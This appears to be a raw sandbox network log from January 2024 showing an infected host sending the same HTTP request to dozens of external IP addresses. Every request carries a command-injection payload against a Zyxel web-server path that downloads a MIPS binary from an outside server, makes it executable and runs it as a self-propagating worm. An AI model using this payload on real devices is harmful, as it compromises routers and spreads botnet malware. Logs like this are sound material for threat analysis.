                                                        Jan 28, 2024 10:12:55.448632002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5057192.168.2.144720242.254.183.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448683977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5058192.168.2.145509013.86.161.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448726892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5059192.168.2.1455970146.219.100.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448770046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5060192.168.2.1442268159.141.232.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448807955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5061192.168.2.145082841.34.58.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448837042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5062192.168.2.145784444.160.248.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448884964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5063192.168.2.1440598151.202.14.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448913097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5064192.168.2.143503441.78.56.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448941946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5065192.168.2.143294276.35.22.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448999882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5066192.168.2.145597092.19.72.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449037075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5067192.168.2.143360632.85.167.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449071884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5068192.168.2.145512878.191.214.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449105978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5069192.168.2.1442058118.51.67.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449166059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5070192.168.2.144422482.225.255.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449209929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5071192.168.2.145356417.112.75.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449243069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5072192.168.2.144398617.79.240.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449261904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5073192.168.2.14368249.163.120.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449302912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5074192.168.2.145044449.164.122.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449332952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5075192.168.2.1445222110.124.48.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449352026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5076192.168.2.145963859.31.149.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449423075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5077192.168.2.144984649.126.189.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449439049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5078192.168.2.1458520124.196.183.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449482918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5079192.168.2.1433374201.245.239.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449512959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5080192.168.2.1444362190.126.163.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449569941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5081192.168.2.144464458.192.49.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449601889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5082192.168.2.1445868219.172.124.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449637890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5083192.168.2.1435822134.3.250.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449681044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5084192.168.2.1433998199.182.18.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449723005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5085192.168.2.1450336120.156.50.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449752092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5086192.168.2.1450970129.41.202.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449790955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5087192.168.2.145102276.171.21.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449850082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5088192.168.2.145892092.255.37.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449893951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5089192.168.2.1438928123.118.102.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449925900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5090192.168.2.1444916169.189.176.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.449959993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5091192.168.2.145525434.100.106.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450007915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5092192.168.2.14498689.83.122.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450042963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5093192.168.2.143442661.180.40.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450082064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5094192.168.2.1455640108.4.210.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450114012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5095192.168.2.1442982204.3.79.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450143099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5096192.168.2.1453168105.8.149.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450171947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5097192.168.2.14402988.48.228.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450216055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5098192.168.2.1444562108.49.222.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450251102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5099192.168.2.1437066130.252.201.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450273037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5100192.168.2.1448122154.224.40.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450321913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5101192.168.2.1442482116.96.187.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450347900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5102192.168.2.1433824158.68.113.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450377941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5103192.168.2.1434480120.42.32.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450437069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5104192.168.2.1439696164.241.118.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450470924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5105192.168.2.1443798154.124.174.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450510025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5106192.168.2.143889271.25.30.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450542927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5107192.168.2.1446070159.19.111.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450567961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5108192.168.2.1433820209.39.137.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450604916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5109192.168.2.1457216106.161.217.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450630903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5110192.168.2.145244224.123.254.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450685024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5111192.168.2.145807651.246.37.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450730085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5112192.168.2.1432776213.175.89.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450769901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5113192.168.2.1444014113.109.137.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450788021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5114192.168.2.1434338207.237.67.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450824022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5115192.168.2.145526065.78.195.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450872898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5116192.168.2.1437030206.255.134.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450910091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5117192.168.2.145881623.116.222.226443
                                                        TimestampBytes transferredDirectionData
